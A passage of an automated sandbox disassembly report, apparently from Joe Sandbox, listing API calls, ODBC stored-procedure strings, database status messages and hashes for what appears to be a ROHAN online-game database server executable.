                                                                                      • SendMessageA.USER32(?,00000115,?,00000000), ref: 004113B2
                                                                                      • BeginPaint.USER32(?,?), ref: 00411622
                                                                                      • GetScrollInfo.USER32(?,00000001,0000001C), ref: 0041164F
                                                                                      • GetScrollInfo.USER32(?,00000000,0000001C), ref: 0041166E
                                                                                      • EndPaint.USER32(?,?), ref: 00411796
                                                                                      • PostQuitMessage.USER32(00000000), ref: 004117A2
                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 004117BC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoScroll$MessagePaint$BeginClientMetricsPostProcQuitRectReleaseSendTextWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3697802598-0
                                                                                      • Opcode ID: 97e99601a346c46c502f257257916880095954d55c12d50e0f720f6c2f7df7dc
                                                                                      • Instruction ID: dc2b2b32ec318f444bb8fe7e9ab46799124cb3e49aa9e36f7ea6669df2b08ad1
                                                                                      • Opcode Fuzzy Hash: 97e99601a346c46c502f257257916880095954d55c12d50e0f720f6c2f7df7dc
                                                                                      • Instruction Fuzzy Hash: 31021574A00219DFDB64CF54DC84F99B7B5EB49304F10819AE60DAB3A2D734AAC4CF68
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetMallItem](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) } ,000000FD), ref: 00425B3F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00425B7E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00425BB6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00425BEE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425C23
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00425C5B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00425C93
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00425CCB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,0000002A,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 00425D0E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FE,000000FD,0000002A), ref: 00425D46
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425D7E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425DB6
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425DEE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425E26
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 00425E5E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00425E96
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00425ECE
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetMallItem](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) } , xrefs: 00425B36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetMallItem](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?) }
                                                                                      • API String ID: 0-2232177755
                                                                                      • Opcode ID: 7994a92376efe55deeebcad78c347170df0fba6ec599dcefe384d76fad8e8a10
                                                                                      • Instruction ID: 45e04e4a863b5097c55d3ed84abd5177388415835396daea94fe194b5be6bec3
                                                                                      • Opcode Fuzzy Hash: 7994a92376efe55deeebcad78c347170df0fba6ec599dcefe384d76fad8e8a10
                                                                                      • Instruction Fuzzy Hash: BBB1D0B06443157BEBA49B54CC52FE97379EB84F18F208288F6197E2C5DBB16D80CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_InsertRevenge](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)},000000FD), ref: 0043D979
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043D9B8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043D9ED
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DA25
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DA5D
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DA95
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000014), ref: 0043DACD
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DB05
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DB3D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000014), ref: 0043DB75
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DBAD
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000014,00000000,?,00000015,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DBE5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000014), ref: 0043DC1D
                                                                                      • #72.ODBC32(?,00000000,00000001,00000001,0000000C,00000011,00000000,?,00000012,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DC55
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,00000001,0000000C,00000011), ref: 0043DC8D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 0043DCC5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043DCFD
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_InsertRevenge](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)}, xrefs: 0043D970
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_InsertRevenge](?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)}
                                                                                      • API String ID: 0-2024812675
                                                                                      • Opcode ID: e1ff52709ae270e1e992ff76ff0d0c4a846097a098b60c116e603dfb11948636
                                                                                      • Instruction ID: 5ba03d395e5a6251bedcffc5dfbeb460785ce0c60a5af9f32bc21de364000132
                                                                                      • Opcode Fuzzy Hash: e1ff52709ae270e1e992ff76ff0d0c4a846097a098b60c116e603dfb11948636
                                                                                      • Instruction Fuzzy Hash: A9B11F74A90258BBEB249B64CC62FF96335EB85B18F20C185F75C6E3C6D1F169C48B18
                                                                                      APIs
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000), ref: 0044852E
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000), ref: 0044855E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 0044858E
                                                                                      • #4.ODBC32(?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 004485BE
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?,00000015,00000000,?,00000000,000000F0,?), ref: 004485EE
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,00000001,?), ref: 0044861E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044864E
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044867E
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 004486AE
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F0,?), ref: 004486DE
                                                                                      • #4.ODBC32(?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F1,?), ref: 0044870E
                                                                                      • #4.ODBC32(?,00000000,000000FE,?,0000002A,00000000,?,00000000,000000F0,?,00000000,00000000,?,00000000,000000F0,?), ref: 0044873E
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FE,?,0000002A,00000000,?,00000000,000000F0,?), ref: 0044876E
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FE,?), ref: 0044879E
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 004487D1
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00448803
                                                                                      • #4.ODBC32(?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00448836
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?,00000000,00000000,?,00000000,000000FA,?), ref: 00448869
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000FA,?), ref: 0044889B
                                                                                      • #4.ODBC32(?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?,00000000,00000000,?,00000000,000000F1,?), ref: 004488CE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b82433fd01ebd2ba9ee40d62f6d16c4faec5fcbaaf10a81d7c081381efef329a
                                                                                      • Instruction ID: 05e5a3d1914845e52981bc63132b2f3f7f07a0bdd15e73a41dc28742802a5d4a
                                                                                      • Opcode Fuzzy Hash: b82433fd01ebd2ba9ee40d62f6d16c4faec5fcbaaf10a81d7c081381efef329a
                                                                                      • Instruction Fuzzy Hash: 0EB10DB0B02118AFEB24DB09CD51FEA7375EF85714F148288F6996E3C1D6B16D808B56
                                                                                      APIs
                                                                                      • EnterCriticalSection.KERNEL32(004E9C14), ref: 0046425E
                                                                                      • LeaveCriticalSection.KERNEL32(004E9C14), ref: 00464586
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00464597
                                                                                      Strings
                                                                                      • Alloc : IOBuffer(%d/%d), xrefs: 004642CB
                                                                                      • Running DB Request : %d, xrefs: 0046428F
                                                                                      • Pending DB Queue : %d, xrefs: 004642AA
                                                                                      • ===========================, xrefs: 004643DE
                                                                                      • ===========================, xrefs: 004642DF
                                                                                      • Running Thread : %d, xrefs: 00464274
                                                                                      • GameDB : Connection ( %d ), Connect Fail ( %d ), Task ( %d ), Pipe ( %d ), xrefs: 0046437B
                                                                                      • TASK ( %d ) , Count( %d ), xrefs: 00464551
                                                                                      • TASK ( %d ) , Count( %d ), xrefs: 0046448E
                                                                                      • LoginDB Blocked Query : %d, xrefs: 00464321
                                                                                      • GameDB Blocked Query : %d, xrefs: 00464300
                                                                                      • ===========================, xrefs: 00464335
                                                                                      • ===========================, xrefs: 0046456D
                                                                                      • LoginDB : Connection ( %d ), Connect Fail ( %d ), Task ( %d ), Pipe ( %d ), xrefs: 004643C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterInvalidateLeaveRect
                                                                                      • String ID: ===========================$ ===========================$ ===========================$ ===========================$ Alloc : IOBuffer(%d/%d)$ GameDB : Connection ( %d ), Connect Fail ( %d ), Task ( %d ), Pipe ( %d )$ GameDB Blocked Query : %d$ LoginDB : Connection ( %d ), Connect Fail ( %d ), Task ( %d ), Pipe ( %d )$ LoginDB Blocked Query : %d$ Pending DB Queue : %d$ Running DB Request : %d$ Running Thread : %d$TASK ( %d ) , Count( %d )$TASK ( %d ) , Count( %d )
                                                                                      • API String ID: 4158910955-3128254065
                                                                                      • Opcode ID: bc64e089267ab02ba270f42b16b1722fde50ce0290cd3f3ed8c5a7212f917523
                                                                                      • Instruction ID: dc6136dfce2db962c381bdfd294578c71068bedf9f7092b4d41d9854f4e692fb
                                                                                      • Opcode Fuzzy Hash: bc64e089267ab02ba270f42b16b1722fde50ce0290cd3f3ed8c5a7212f917523
